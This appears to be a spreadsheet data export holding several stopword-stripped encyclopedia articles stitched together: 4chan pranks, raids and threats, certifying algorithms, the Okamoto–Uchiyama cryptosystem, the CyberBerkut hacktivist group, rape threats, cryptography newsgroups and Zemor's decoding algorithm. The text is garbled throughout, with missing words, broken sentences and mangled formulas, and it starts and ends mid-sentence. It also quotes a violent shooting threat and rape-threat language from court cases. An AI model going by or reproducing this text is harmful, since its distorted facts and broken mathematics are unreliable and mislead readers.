1987 song "never gonna give up". thus, "rickroll" born.a link youtube video zonday's song "chocolate rain" posted july 2007 subsequently circulated users, becoming popular internet meme. portion song zonday turns away microphone, caption stating move away breathe in", became oft-repeated meme 4chan inspired remixes. fellow youtuber boxxy's popularity part 4chan.in american incarnation, pedobear anthropomorphic bear child predator often used within community mock contributors showing sexual interest children. pedobear popular memes non-english imageboards, gained recognition across europe, appearing offline publications. used symbol pedophilia maltese graffiti vandals prior papal visit. anonymous anti-scientology activism 4chan labeled starting point anonymous meme baltimore city paper, norm posts signed "anonymous" moniker. national post's david george-cosh said "widely reported" anonymous associated 4chan 711chan, well numerous internet relay chat (irc) channels.through association anonymous, 4chan become associated project chanology, worldwide protest church scientology held members anonymous. january 2008, 4chan user posted /b/, suggesting participants something big" church scientology's website. this message resulted church receiving threatening phone calls. quickly grew large real-world protest. unlike previous anonymous attacks, action characterized 4chan memes including rickrolls fawkes masks. raid drew criticism 4chan users felt would bring site undesirable attention. little pony: friendship magic fandom adult fandom subculture dedicated children's animated television series little pony: friendship magic began "comics cartoons" (/co/) board 4chan. show first discussed interest around debut october 2010. users /co/ took heightened interest show critical cartoon brew article shared, resulting praise plot, characters, animation style. discussion show extended /b/, eventually point contention. discussion spread forth communities external 4chan, including establishment websites, causing show reach wider audience across internet. media attention internet attacks according washington post, "the site's users managed pull highest-profile collective actions history internet."users 4chan websites "raided" turner launching ddos attacks prank calling phone-in radio show december 2006 january 2007. attacks caused turner's website offline. this cost thousands dollars bandwidth bills according turner. response, turner sued 4chan, 7chan, websites; however, lost plea injunction failed receive letters court.kttv aired report anonymous, calling group "hackers steroids", "domestic terrorists", collectively "internet hate machine" july 2007. slashdot founder malda posted comment made another slashdot user, miang, stating story focused mainly users "4chan, 7chan 420chan". miang claimed report "seems confuse raids motivational poster templates genuine threat american public", arguing "unrelated" footage exploding shown report "equate anonymous posting domestic terror".on july 2008, swastika unicode character appeared google's trends list—a tally used search terms united states—for several hours. later reported html numeric character reference symbol posted /b/, request perform google search string. multitude visitors followed order pushed symbol chart, though google later removed result.later year, private yahoo! mail account sarah palin, republican vice presidential candidate 2008 united states presidential election, hacked 4chan user. hacker posted account's password /b/, screenshots within account wikileaks. user logged changed password, posting screenshot sending email friend palin's informing password thread. however, forgot blank password screenshot. multitude users attempted password, account automatically locked yahoo!. incident criticized users. user commented, "seriously, /b/. could changed history failed, epically." secret service began investigating incident shortly occurrence. september revealed questioning david kernell, democratic tennessee state representative mike kernell.the stock price apple inc. fell significantly october 2008 hoax story submitted cnn's user-generated news site ireport.com claiming company steve jobs suffered major heart attack. source story traced back 4chan.in 2009, members site attacked youtube, posting pornographic videos site. 4chan member acknowledged part attack, telling news response youtube "deleting music". january 2010, members site attacked youtube response suspension youtube user lukeywes1234 failing meet minimum requirement thirteen. videos uploaded user apparently become popular 4chan members, subsequently became angered account suspended called wave pornographic videos uploaded youtube january 2010. later year, 4chan made numerous disruptive pranks directed singer justin bieber.in september 2010, retaliation bollywood film industry's hiring aiplex software launch cyberattacks pirate bay, anonymous members, recruited posts 4chan boards, subsequently initiated attacks, dubbed operation payback, targeting website motion picture association america recording industry association america. targeted websites usually went offline short period time attacks, recovering. website firm acs:law, associated anti-piracy client, affected cyber-attack. retaliation initial attacks called minor nuisance, anonymous launched attacks, bringing site again. after coming back front page accidentally revealed backup file entire website, contained megabytes private company emails, leaked several torrents across several sites internet. suggested data leak could cost firm £500,000 fines breaching british data protection laws.in january 2011, news reported firm announced stop "chasing illegal file-sharers". head acs:law andrew crossley statement court addressed issues influenced decision back ceased work subject criminal attack. e-mails hacked. death threats bomb threats."in august 2012, 4chan users attacked third-party sponsored mountain campaign, dew, users asked submit vote name ideas green apple flavor drink. users submitted entries "diabeetus", "fapple", several variations "gushing granny", "hitler nothing wrong". threats violence october 2006, department homeland security warned national football league officials miami, york city, atlanta, seattle, houston, oakland, cleveland possible threat involving simultaneous dirty bombs stadiums. threat claimed attack would carried october final muslim holy month ramadan. both department homeland security expressed doubt concerning credibility threats, warned relevant organizations precaution. threat turned ill-conceived hoax perpetrated grocery store clerk wisconsin terrorist ties. considered clearly frivolous threat 20-year-old charged fabricating terrorist threat, sentenced months prison followed months' house arrest, ordered $26,750 restitution. around midnight september 2007, student posted photographs mock pipe bombs another photograph holding saying would blow high school—pflugerville high school pflugerville, texas—at 9:11 september users 4chan helped track finding perpetrator's father's name exif data photograph took, contacted police. arrested school began day. incident turned hoax; "weapons" toys actual bombs.jarrad willis, 20-year-old melbourne, australia arrested december 2007, apparently posting 4chan "going shoot kill many people time incapacitated killed police". post, accompanied image another holding shotgun, threatened shopping mall near beverly hills. while investigation still open, willis charged criminal defamation separate incident died case heard.on february 2009, posting 4chan board said would school shooting eskils gymnasium eskilstuna, sweden, leading 1,250 students teachers evacuated. 21-year-old arrested 4chan provided police address poster. police said suspect called joke, released found indication threat serious.on january 2014, anonymous poster started thread identifying student named westley sullivan apparently went high school poster. original post included link westley sullivan's facebook profile, since taken down, screenshot post said fairview closed tomorrow going blow up", referring sullivan's high school, fairview high school, ashland, kentucky. anonymous individuals went sullivan's facebook profile found address, phone number, school number, school schedule teachers, personal information. information like teachers number posted directly, personal information like address found exif data pictures posted profile. these individuals contacted fairview school officials local police department, well fbi. next learned police arrested sullivan home charged degree terroristic threatening, class felony kentucky.on june 2018, named eric radulovic arrested following indictment u.s. department justice count transmitting interstate foreign commerce threat injure person another." indictment alleged radulovic posted anonymously /pol/ unite right rally, communicating intention attack protestors upcoming right-wing demonstration, ostensibly elicit sympathy alt-right movement. "i'm going bring remington start shooting alt-right guys. need sympathy landwhale liberals teary eyed, someone going make look like left becoming violent radicalized. it's false flag sure, i'll aiming tanned/dark haired muddied jeans crowd real whites worry," wrote radulovic, according indictment. child pornography fixture media attention, child pornography posted 4chan various times. "this post art" july 2014, anonymous user made reply thread board /pol/ "politically incorrect" 4chan, criticizing modern ironic fashion, saying: used something cherish literally anything could this post art. less hour later post photographed screen framed another user posted another reply thread photo framed quote. later user, endorsement anonymous users thread, created auction ebay framed photo quickly rose high prices, culminating price $90,900. celebrity photo leaks august 2014, compromise user passwords icloud allowed large number private photographs taken celebrities posted online, initially 4chan. result incident, 4chan announced would enforce digital millennium copyright policy, would allow content owners remove material shared site illegally, would users repeatedly posted stolen material. gamergate also august 2014, 4chan involved gamergate controversy, began unsubstantiated allegations indie game developer quinn ex-boyfriend, followed false allegations anonymous internet users. allegations followed harassment campaign several women video game industry, organized 4chan users, particularly /r9k/. discussion regarding gamergate banned 4chan alleged rule violations, gamergate supporters moved alternate forums 8chan. murder port orchard, washington according court documents filed november 2014, images posted 4chan appeared murder victim. body discovered port orchard, washington, images posted. posts accompanied text: "turns harder strangle someone death looks movies." later post said: "check news port orchard, washington, hours. home school soon. he'll find her, call cops. wanted share pics find me." victim amber lynn coplin, aged suspect, 33-year-old david michael kalac, surrendered police oregon later day; charged second-degree murder involving domestic violence. kalac convicted april 2017 sentenced years prison following month. bianca devins murder july 2019, 17-year-old bianca devins murdered 21-year-old brandon clark utica, york went concert together. suspect took pictures victim's bloodied deceased body posted discord instagram page. photos widely shared instagram sites, particularly 4chan, many users mocked celebrated death, saying deserved praising killer depicting devins manipulative young woman. devins developed small following online 4chan user herself. clark later pleaded guilty crime sentenced minimum years' imprisonment. death jeffrey epstein report jeffrey epstein's death posted /pol/ around minutes news broke news. originally suspected unidentified person made posts first responder, prompting review york city fire department, later stated post come member department. 2022 buffalo shooting 2022, mass shooting occurred supermarket buffalo, york, usa. accused, payton gendron, reported written raci</t>
  </si>
  <si>
    <t>Certifying algorithm</t>
  </si>
  <si>
    <t>theoretical computer science, certifying algorithm algorithm outputs, together solution problem solves, proof solution correct. certifying algorithm said efficient combined runtime algorithm proof checker slower constant factor best known non-certifying algorithm problem.the proof produced certifying algorithm sense simpler algorithm itself, otherwise algorithm could considered certifying (with output verified running algorithm again). sometimes formalized requiring verification proof take less time original algorithm, problems particular solution found linear time) simplicity output proof considered less formal sense. instance, validity output proof apparent human users correctness algorithm, checker proof amenable formal verification.implementations certifying algorithms also include checker proof generated algorithm considered reliable non-certifying algorithms. for, whenever algorithm run, three things happens: produces correct output (the desired case), detects algorithm implication (undesired, generally preferable continuing without detecting bug), algorithm checker faulty masks prevents detected (undesired, unlikely depends existence independent bugs). examples many examples problems checkable algorithms come graph theory. instance, classical algorithm testing whether graph bipartite would simply output boolean value: true graph bipartite, false otherwise. contrast, certifying algorithm might output 2-coloring graph case bipartite, cycle length not. graph bipartite 2-colored, non-bipartite contains cycle. both checking whether 2-coloring valid checking whether given odd-length sequence vertices cycle performed simply testing bipartiteness.analogously, possible test whether given directed graph acyclic certifying algorithm outputs either topological order directed cycle. possible test whether undirected graph chordal graph certifying algorithm outputs either elimination ordering ordering vertices that, every vertex, neighbors later ordering form clique) chordless cycle. possible test whether graph planar certifying algorithm outputs either planar embedding kuratowski subgraph.the extended euclidean algorithm greatest common divisor integers certifying: outputs three integers (the divisor), this equation true multiples greatest common divisor, testing greatest common divisor performed checking divides equation correct. also sanity check, simple test correctness output intermediate result required complete proof correctness references</t>
  </si>
  <si>
    <t>Okamoto–Uchiyama cryptosystem</t>
  </si>
  <si>
    <t>okamoto–uchiyama cryptosystem public cryptosystem proposed 1998 tatsuaki okamoto shigenori uchiyama. system works multiplicative group integers modulo {\displaystyle (\mathbb /n\mathbb )^{*}} form large primes. operation like many public cryptosystems, scheme works group {\displaystyle (\mathbb /n\mathbb )^{*}} this scheme homomorphic hence malleable. generation public/private pair generated follows: generate large primes {\displaystyle {\displaystyle compute {\displaystyle n=p^{2}q} choose random integer {\displaystyle g\in \{2\dots n-1\}} {\displaystyle g^{p-1}\not \equiv 1\mod p^{2}} compute {\displaystyle h=g^{n}{\bmod {n}}} .the public {\displaystyle (n,g,h)} private {\displaystyle (p,q)} encryption message {\displaystyle m&lt;p} encrypted public {\displaystyle (n,g,h)} follows. choose random integer {\displaystyle r\in \{1\dots n-1\}} compute {\displaystyle c=g^{m}h^{r}{\bmod {n}}} .the value {\displaystyle encryption {\displaystyle decryption encrypted message {\displaystyle decrypted private {\displaystyle (p,q)} follows. compute {\displaystyle a={\frac {(c^{p-1}{\bmod {p^{2}}})-1}{p}}} compute {\displaystyle b={\frac {(g^{p-1}{\bmod {p^{2}}})-1}{p}}} {\displaystyle {\displaystyle integers. using extended euclidean algorithm, compute inverse {\displaystyle modulo {\displaystyle {\displaystyle b'=b^{-1}{\bmod {p}}} compute {\displaystyle m=ab'{\bmod {p}}} .the value {\displaystyle decryption {\displaystyle example {\displaystyle p=3} {\displaystyle q=5} then {\displaystyle n=3^{2}\cdot 5=45} select {\displaystyle g=22} then {\displaystyle h=22^{45}{\bmod {4}}5=37} encrypt message {\displaystyle m=2} pick random {\displaystyle r=13} compute {\displaystyle c=g^{m}h^{r}{\bmod {n}}=22^{2}37^{13}{\bmod {4}}5=43} decrypt message compute {\displaystyle a={\frac {(43^{2}{\bmod {3}}^{2})-1}{3}}=1} {\displaystyle b={\frac {(22^{2}{\bmod {3}}^{2})-1}{3}}=2} {\displaystyle b'=2^{-1}{\bmod {3}}=2} .and finally {\displaystyle m=ab'=2} proof correctness wish prove value computed last decryption step, {\displaystyle ab'{\bmod {p}}} equal original message {\displaystyle {\displaystyle (g^{m}h^{r})^{p-1}\equiv (g^{m}g^{nr})^{p-1}\equiv (g^{p-1})^{m}g^{p(p-1)rpq}\equiv (g^{p-1})^{m}\mod p^{2}} recover {\displaystyle need take discrete logarithm base {\displaystyle g^{p-1}} group {\displaystyle (\mathbb /n\mathbb )^{*}\simeq (\mathbb /p^{2}\mathbb )^{*}\times (\mathbb /q\mathbb )^{*}} define subgroup {\displaystyle \mathbb /p^{2}\mathbb ^{*}} cardinality {\displaystyle h=\{x:x^{p-1}\mod p^{2}=1+rp,0&lt;r&lt;p\}} .for element {\displaystyle (\mathbb /p^{2}\mathbb )^{*}} xp−1 since divides xp−1 {\displaystyle l(x)={\frac {x-1}{p}}} thought logarithm cyclic group additive group {\displaystyle \mathbb /p\mathbb easy check l(ab) l(a) l(b), isomorphism groups. case usual logarithm, l(x)/l(g) sense, logarithm base accomplished {\displaystyle {\frac {l\left((g^{p-1})^{m}\right)}{l(g^{p-1})}}=m\mod security security entire message shown equivalent factoring semantic security rests p-subgroup assumption, assumes difficult determine whether element {\displaystyle (\mathbb /n\mathbb )^{*}} subgroup order this similar quadratic residuosity problem higher residuosity problem. references okamoto, tatsuaki; uchiyama, shigenori (1998). public-key cryptosystem secure factoring". advances cryptology eurocrypt'98. lecture notes computer science. vol. 1403. springer. 308–318. doi:10.1007/bfb0054135.</t>
  </si>
  <si>
    <t>CyberBerkut</t>
  </si>
  <si>
    <t>cyberberkut (russian: киберберкут, ukrainian: кіберберкут) modern organized group pro-russian hacktivists. group became locally known series publicity stunts distributed denial-of-service (ddos) attacks ukrainian government, western ukrainian corporate websites. 2018, group accused western intelligence agencies, national cyber security centre (united kingdom) linked gru, providing plausible deniability. background group emerged dissolution special police force "berkut" became notorious violent repression used euromaidan demonstrations. group anonymous. their proclaimed goals fighting neo-fascism, neo-nationalism arbitrary power ukraine. aim, cyberberkut activists targeted "right sector" resources. cyberberkut targets included nato allies. activity attacks nato websites. attacks u.s. private military companies. publication correspondence deputies (political parties) batkivshchyna ukrainian democratic alliance reform. publication correspondence united states embassy ukraine united states foundations. disclosure public telephone recording yulia tymoshenko nestor shufrych. disclosure public telephone recording high representative foreign affairs catherine ashton foreign minister estonia urmas paet. blocking cellular phones members yatsenyuk government persons close them. blocking internet resources secretary national security defence council ukraine andriy parubiy news portals: ligabusinessinform ukrainian independent information agency. publication video materials blocked youtube. attempts disrupting recruitment national guard ukraine. attempted destruction electronic system central election commission ukraine prior 2014 ukrainian presidential election. publishing lists alleged ukrainian military deserters attempts disrupting work central election commission ukraine damaging ifes system elections blocking cellphones organisators. temporary disruption websites ministry internal affairs general prosecutor ukraine. websites channels inter also temporary disrupted. email hacking publication conversation ihor kolomoyskyi persecutor lviv oblast, hacking computer email person related ihor kolomoyskiy. archives contents email accounts lviv oblast's prosecutor office employees. hacking publishing minister internal affairs arsen avakov's conversation. blocking website president ukraine petro poroshenko june 2014. publication real name biography semen semenchenko konstantin grishin. hacking german chancellery german bundestagthe group also publishes pro-donetsk people's republic videos. claimed ukrainian security forces living "jewish occupation". response repeated blocking cb's facebook pages, although ones made following day. likely response attacking websites greystone limited triple canopy, cyberberkut's websites temporarily disrupted. websites started work following day. arrests people suspected relation cyberberkut. also hacktivism internet activism hacker (term) denial-of-service attack trolls olgino anonymous (group) notes references external links official website cyberberkut facebook cyberberkut twitter</t>
  </si>
  <si>
    <t>Rape threat</t>
  </si>
  <si>
    <t>rape threat threat made another person rape sexual assault. rape threats often made anonymously online social media, especially social media influencers. these threats often made prominent people high-profile writers, actors, comedians politicians. measure general prevalence rape threats varies substantially depending whether studies examine online social media specifically; email, text messaging forms communication; threats made person; whether rape threats considered form attempted rape; whether rape threats considered separately threats unwanted sexual contact. according study college-age women united states, many 90.5% rape threats reported police, common reason failure report unclear action crime harm intended. enforcement courts criticized victims advocates inadequate response rape threat, existing laws often apply threat issues social media. least cases reached national supreme courts. definition rape threat, threat rape defined national college women sexual victimization study "threat unwanted penetration force threat force", national violence against college women study "threatened forced sexual intercourse, including psychological coercion well physical force". alternatively, national crime victimization survey included threats rape form attempted rape.: prevalence according 2017 report amnesty international, women united kingdom received "direct indirect threats physical sexual violence" reported receiving "sexist misogynistic abuse". online harassment rape threats often made online social media form online harassment, especially women. according english columnist laurie penny, "every female writer knows received threats violence rape.": australian author emma jane, described career writing weekly column "14-year rape-threat-a-palooza". according karla mantilla, editor academic journal feminist studies, "rape death threats common almost rule rather exception women trolled harassed online.": according study 134,000 abusive comments social media, found occur platform twitter, another occurred facebook, remainder various forums blogs. another review demos identified 100,000 uses word rape twitter december 2013 february 2014 estimated threatening.another examination found women australia 9.6% women united kingdom reported receiving "comments, email text messages threatening sexual assault". common women (%19.6) followed women years (%17), australia women affected group (%13.5).: against politicians according 2016 study lawmakers countries inter-parliamentary union, 44.4% elected female representative threatened rape violence office, 65.5% reported received "humiliating remarks sexual sexist nature" either "several times" "often". respondent particular reported received online rape threats social media platform twitter course four days.threats politicians received increasing coverage resulting number high-profile cases. 2018, indian minister home affairs ordered police mumbai pursue legal action case rape threats made twitter 10-year-old daughter politician priyanka chaturvedi. also 2018, connection brett kavanaugh supreme court nomination, offices number politicians received threats violence rape, including dianne feinstein. 2014 indian actor member parliament tapas paul issued public apology threatening "let loose [his] boys" rape members opposing communist party india. widespread social media campaign launched support ghanaian supreme court justice georgina theodora wood following public rape threats her. united kingdom, member parliament jess phillips called anonymity twitter users receiving rape threats single night.in 2018, deserae morin, republican vermont house representatives, received letter called "cunt" said, "first, rape days. scream know agonizing horror." college review national studies college women united states, fisher found incidence rate verbal threats rape reported 0.01% 0.48% respondents.in 2000, department justice's published results sexual victimization college women, collected data four types threats: threat rape threat unwanted penetration force threat force. threat contact force threat force threat unwanted sexual contact force threat force. threat penetration without force threat unwanted penetration threat nonphysical punishment, promise reward, pestering/verbal pressure. threat contact without force threat unwanted sexual contact threat nonphysical punishment, promise reward, pestering/verbal pressure.the results indicated 0.31% received rape threats, compared 1.7% victims rape. total, 0.18% threatened contact using force threat force, 0.22% threatened penetration without force, 0.34% threatened contact without force.: they found that, received rape threats, 54.8% occurred campus, received rape threats taken measures protect themselves, 90.5% cases reported police.: 20–4 common reasons failure report threats police that: victim think incident serious enough report (35.8%) unclear action crime harm intended (39.5%) victims think police would take report seriously (34.2%) victim want people know (34.2%) because lack proof incident occurred (31.6%) victim feel police would want bothered (31.6%): 24–5 legal history enforcement court system received criticism trivializing issue rape threats.: widely cited 2014 pacific standard, amanda hess recounted police separate occasions dismissing reports response receiving rape threats online. director cyberbullying research center told vice, existing laws often cover social media.when challenged least cases reached national supreme courts, canadian court found favor plaintiff, united states found favor defendant. mccraw case mccraw, supreme court canada considered whether rape threats considered threats bodily harm nation's criminal code. defendant anonymously sent typed letters three women graphically detailing sexual fantasies promising "i'm going fuck even even rape you". courts originally ruled letters culpable threats, constituted "adoring fantasies", because, "rape necessarily involve serious bodily harm even bodily harm." this overturned supreme court, citing "rape violence, sexual act. crime likely serious psychological consequences may, well, serious physical effects." elonis united states case elonis united states defendant anthony elonis convicted four counts related series rape death threats made facebook former wife, addition threats made co-workers, kindergarten class, local police, agent. fired posts, wife granted three-year protective order him, eventually sentenced months imprisonment. elonis asked court dismiss charges, arguing form artistic expression therapeutic release. wife testified perceived posts threats, stating "felt extremely afraid mine children’s family’s lives." supreme court united states ruled favor elonis, government failed demonstrate intended remarks taken threats. also death threat gamergate controversy, online harassment campaign targeted women video game industry laws regarding rape notes references</t>
  </si>
  <si>
    <t>Cryptography newsgroups</t>
  </si>
  <si>
    <t>there several newsgroups relevant discussions cryptography related issues. sci.crypt unmoderated forum discussions technical aspects cryptography. sci.crypt.research similar, moderated group, focusing research cryptography. founded based charter peter gutmann. sci.crypt.random-numbers discuss generation cryptographically secure random numbers. talk.politics.crypto discussions relationship cryptography government. original charter d.j. silverton. alt.security.pgp discussion pretty good privacy (pgp) related software. sci.crypt 1995, bruce schneier commented, read estimated 100,000 people worldwide. most posts nonsense, bickering, both; political, rest requests information basic questions. occasionally nuggets useful information posted newsgroup." (applied cryptography, pages 608–609). leaked descriptions secret algorithms posted internet sci.crypt, example rc2, khufu khafre. others hoaxes: iraqi block cipher s-1, latter alleged description (then-secret) skipjack cipher. group also origin term, "rubber-hose cryptanalysis". external links newsgroups cryptography sci.crypt frequently asked questions</t>
  </si>
  <si>
    <t>Zemor's decoding algorithm</t>
  </si>
  <si>
    <t>coding theory, zemor's algorithm, designed developed gilles zemor, recursive low-complexity approach code construction. improvement algorithm sipser spielman. zemor considered typical class sipser–spielman construction expander codes, underlying graph bipartite graph. sipser spielman introduced constructive family asymptotically good linear-error codes together simple parallel algorithm always remove constant fraction errors. article based venkatesan guruswami's course notes code construction zemor's algorithm based type expander graphs called tanner graph. construction code first proposed tanner. codes based double cover {\displaystyle regular expander {\displaystyle bipartite graph. {\displaystyle {\displaystyle \left(v,e\right)} {\displaystyle vertices {\displaystyle edges {\displaystyle {\displaystyle {\displaystyle \cup {\displaystyle {\displaystyle {\displaystyle \cap {\displaystyle {\displaystyle \emptyset {\displaystyle {\displaystyle denotes sets vertices. {\displaystyle number vertices group, i.e, {\displaystyle |a|=|b|=n} edge {\displaystyle size {\displaystyle {\displaystyle every edge {\displaystyle endpoint {\displaystyle {\displaystyle {\displaystyle e(v)} denotes edges containing {\displaystyle assume ordering {\displaystyle therefore ordering done every edges {\displaystyle e(v)} every {\displaystyle v\in finite field {\displaystyle \mathbb =gf(2)} word {\displaystyle x=(x_{e}),e\in {\displaystyle \mathbb ^{n}} subword word indexed {\displaystyle e(v)} word denoted {\displaystyle (x)_{v}} subset vertices {\displaystyle {\displaystyle induces every word {\displaystyle x\in \mathbb ^{n}} partition {\displaystyle non-overlapping sub-words {\displaystyle \left(x\right)_{v}\in \mathbb ^{d}} {\displaystyle ranges elements {\displaystyle constructing code {\displaystyle consider linear subcode {\displaystyle c_{o}} {\displaystyle [d,r_{o}d,\delta code, {\displaystyle size alphabet {\displaystyle vertex {\displaystyle v\in {\displaystyle v(1),v(2),\ldots ,v(d)} ordering {\displaystyle vertices {\displaystyle adjacent {\displaystyle code, {\displaystyle x_{e}} linked edge {\displaystyle {\displaystyle define code {\displaystyle binary vectors {\displaystyle x=\left(x_{1},x_{2},\ldots ,x_{n}\right)} {\displaystyle \{0,1\}^{n}} that, every vertex {\displaystyle {\displaystyle {\displaystyle \left(x_{v(1)},x_{v(2)},\ldots ,x_{v(d)}\right)} code word {\displaystyle c_{o}} case, consider special case every edge {\displaystyle adjacent exactly {\displaystyle vertices {\displaystyle means {\displaystyle {\displaystyle make respectively, vertex edge {\displaystyle regular graph {\displaystyle call code {\displaystyle constructed {\displaystyle \left(g,c_{o}\right)} code. given graph {\displaystyle given code {\displaystyle c_{o}} several {\displaystyle \left(g,c_{o}\right)} codes different ways ordering edges incident given vertex {\displaystyle i.e., {\displaystyle v(1),v(2),\ldots ,v(d)} fact code {\displaystyle consist codewords {\displaystyle x_{v}\in c_{o}} {\displaystyle v\in a,b} code {\displaystyle linear {\displaystyle [n,k,d]} {\displaystyle \mathbb generated subcode {\displaystyle c_{o}} linear. code {\displaystyle defined {\displaystyle c=\{c\in \mathbb ^{n}:(c)_{v}\in c_{o}\}} every {\displaystyle v\in figure, {\displaystyle (x)_{v}=\left(x_{e1},x_{e2},x_{e3},x_{e4}\right)\in c_{o}} shows graph {\displaystyle code {\displaystyle matrix {\displaystyle {\displaystyle \lambda equal second largest eigenvalue adjacency matrix {\displaystyle here largest eigenvalue {\displaystyle important claims made: claim {\displaystyle \left({\dfrac {k}{n}}\right)\geq 2r_{o}-1} {\displaystyle rate linear code constructed bipartite graph whose digit nodes degree {\displaystyle whose subcode nodes degree {\displaystyle single linear code parameters {\displaystyle \left(n,k\right)} rate {\displaystyle r=\left({\dfrac {k}{n}}\right)} associated subcode nodes, {\displaystyle k\geq 1-\left(1-r\right)m} proof {\displaystyle rate linear code, equal {\displaystyle k/n} {\displaystyle subcode nodes graph. degree subcode {\displaystyle code must {\displaystyle \left({\dfrac {n}{m}}\right)s} digits, digit node connected {\displaystyle {\displaystyle \left(n\right)s} edges graph. each subcode node contributes {\displaystyle (n-k)} equations parity check matrix total {\displaystyle \left(n-k\right)s} these equations linearly independent. therefore, {\displaystyle \left({\dfrac {k}{n}}\right)\geq \left({\dfrac {({\dfrac {n}{m}})s-(n-k)s}{({\dfrac {n}{m}})s}}\right)} {\displaystyle \geq 1-m\left({\dfrac {n-k}{n}}\right)} {\displaystyle \geq 1-m\left(1-r\right)} since value {\displaystyle i.e., digit node bipartite graph {\displaystyle {\displaystyle r=r_{o}} write {\displaystyle \left({\dfrac {k}{n}}\right)\geq 2r_{o}-1} claim {\displaystyle d\geq n\left({\dfrac {(\delta -({\dfrac {\lambda }{d}}))}{(1-({\dfrac {\lambda }{d}})}})\right)^{2}} {\displaystyle =n\left(\delta ^{2}-o\left({\dfrac {\lambda }{d}}\right)\right)} {\displaystyle \rightarrow (1)} {\displaystyle linear code rate {\displaystyle block code length {\displaystyle minimum relative distance {\displaystyle \delta {\displaystyle edge vertex incidence graph {\displaystyle regular graph second largest eigenvalue {\displaystyle \lambda code {\displaystyle c(b,s)} rate least {\displaystyle 2r_{o}-1} minimum relative distance least {\displaystyle \left(\left({\dfrac {\delta -\left({\dfrac {\lambda }{d}}\right)}{1-\left({\dfrac {\lambda }{d}}\right)}}\right)\right)^{2}} proof {\displaystyle derived {\displaystyle regular graph {\displaystyle number variables {\displaystyle c(b,s)} {\displaystyle \left({\dfrac {dn}{2}}\right)} number constraints {\displaystyle according alon chung, {\displaystyle subset vertices {\displaystyle size {\displaystyle \gamma number edges contained subgraph induced {\displaystyle {\displaystyle {\displaystyle \left({\dfrac {dn}{2}}\right)\left(\gamma ^{2}+({\dfrac {\lambda }{d}})\gamma \left(1-\gamma \right)\right)} result, {\displaystyle \left({\dfrac {dn}{2}}\right)\left(\gamma ^{2}+\left({\dfrac {\lambda }{d}}\right)\gamma \left(1-\gamma \right)\right)} variables least {\displaystyle \gamma constraints neighbours. average number variables constraint {\displaystyle \left({\dfrac {({\dfrac {2nd}{2}})\left(\gamma ^{2}+({\dfrac {\lambda }{d}})\gamma \left(1-\gamma \right)\right)}{\gamma n}}\right)} {\displaystyle =d\left(\gamma +({\dfrac {\lambda }{d}})\left(1-\gamma \right)\right)} {\displaystyle \rightarrow (2)} {\displaystyle d\left(\gamma +({\dfrac {\lambda }{d}})\left(1-\gamma \right)\right)&lt;\gamma word relative weight {\displaystyle \left(\gamma ^{2}+({\dfrac {\lambda }{d}})\gamma \left(1-\gamma \right)\right)} cannot codeword {\displaystyle c(b,s)} inequality {\displaystyle (2)} satisfied {\displaystyle \gamma &lt;\left({\dfrac {1-({\dfrac {\lambda }{d}})}{\delta -({\dfrac {\lambda }{d}})}}\right)} therefore, {\displaystyle c(b,s)} cannot zero codeword relative weight {\displaystyle \left({\dfrac {\delta -({\dfrac {\lambda }{d}})}{1-({\dfrac {\lambda }{d}})}}\right)^{2}} less. matrix {\displaystyle assume {\displaystyle \lambda bounded away {\displaystyle values {\displaystyle {\displaystyle d-1} prime, explicit constructions sequences {\displaystyle regular bipartite graphs arbitrarily large number vertices graph {\displaystyle sequence ramanujan graph. called ramanujan graph satisfies inequality {\displaystyle \lambda (g)\leq 2{\sqrt {d-1}}} certain expansion properties visible graph {\displaystyle separation eigenvalues {\displaystyle {\displaystyle \lambda graph {\displaystyle ramanujan graph, expression {\displaystyle (1)} become {\displaystyle eventually {\displaystyle becomes large. zemor's algorithm iterative decoding algorithm written alternates vertices {\displaystyle {\displaystyle {\displaystyle corrects codeword {\displaystyle c_{o}} {\displaystyle switches correct codeword {\displaystyle c_{o}} {\displaystyle here edges associated vertex side graph incident vertex side. fact, matter order, nodes {\displaystyle {\displaystyle processed. vertex processing also done parallel. decoder {\displaystyle \mathbb :\mathbb ^{d}\rightarrow c_{o}} stands decoder {\displaystyle c_{o}} recovers correctly codewords less {\displaystyle \left({\dfrac {d}{2}}\right)} errors. decoder algorithm received word {\displaystyle w=(w_{e}),e\in {\displaystyle z\leftarrow {\displaystyle t\leftarrow {\displaystyle {\displaystyle number iterations {\displaystyle odd) here algorithm alternate vertex sets. {\displaystyle x\leftarrow else {\displaystyle x\leftarrow iteration {\displaystyle every {\displaystyle v\in {\displaystyle (z)_{v}\leftarrow \mathbb ((z)_{v})} decoding {\displaystyle z_{v}} nearest codeword. output: {\displaystyle explanation algorithm since {\displaystyle bipartite, {\displaystyle vertices induces partition edge {\displaystyle {\displaystyle \cup _{v\in a}e_{v}} {\displaystyle induces another partition, {\displaystyle {\displaystyle \cup _{v\in b}e_{v}} {\displaystyle w\in \{0,1\}^{n}} received vector, recall {\displaystyle n=dn} first iteration algorithm consists applying complete decoding code induced {\displaystyle e_{v}} every {\displaystyle v\in this means replacing, every {\displaystyle v\in vector {\displaystyle \left(w_{v(1)},w_{v(2)},\ldots ,w_{v(d)}\right)} closest codewords {\displaystyle c_{o}} since subsets edges {\displaystyle e_{v}} disjoint {\displaystyle v\in decoding {\displaystyle subvectors {\displaystyle done parallel. iteration yield vector {\displaystyle next iteration consists applying preceding procedure {\displaystyle {\displaystyle replaced {\displaystyle words, consists decoding subvectors induced vertices {\displaystyle coming iterations repeat steps alternately applying parallel decoding subvectors induced vertices {\displaystyle subvectors induced vertices {\displaystyle note: {\displaystyle d=n} {\displaystyle complete bipartite graph, {\displaystyle product code {\displaystyle c_{o}} algorithm reduces natural hard iterative decoding product codes]. here, number iterations, {\displaystyle {\displaystyle \left({\dfrac {(\log {n})}{\log(2-\alpha )}}\right)} general, algorithm correct code word whose hamming weight {\displaystyle ({\dfrac {1}{2}}).\alpha n\delta \left(({\dfrac {\delta }{2}})-({\dfrac {\lambda }{d}})\right)=\left(({\dfrac {1}{4}}).\alpha n(\delta ^{2}-o({\dfrac {\lambda }{d}})\right)} values {\displaystyle \alpha here, decoding algorithm implemented circuit size {\displaystyle o(n\log {n})} depth {\displaystyle o(\log {n})} returns codeword given error vector weight less {\displaystyle \alpha n\delta ^{2}(1-\epsilon )/4} theorem {\displaystyle ramanujan graph sufficiently high degree, {\displaystyle \alpha decoding algorithm correct {\displaystyle ({\dfrac {\alpha \delta _{o}^{2}}{4}})(1-\in errors, {\displaystyle o(\log {n})} rounds big- {\displaystyle notation hides dependence {\displaystyle \alpha this implemented linear time single processor; {\displaystyle processors round implemented constant time. proof since decoding algorithm insensitive value edges linearity, assume 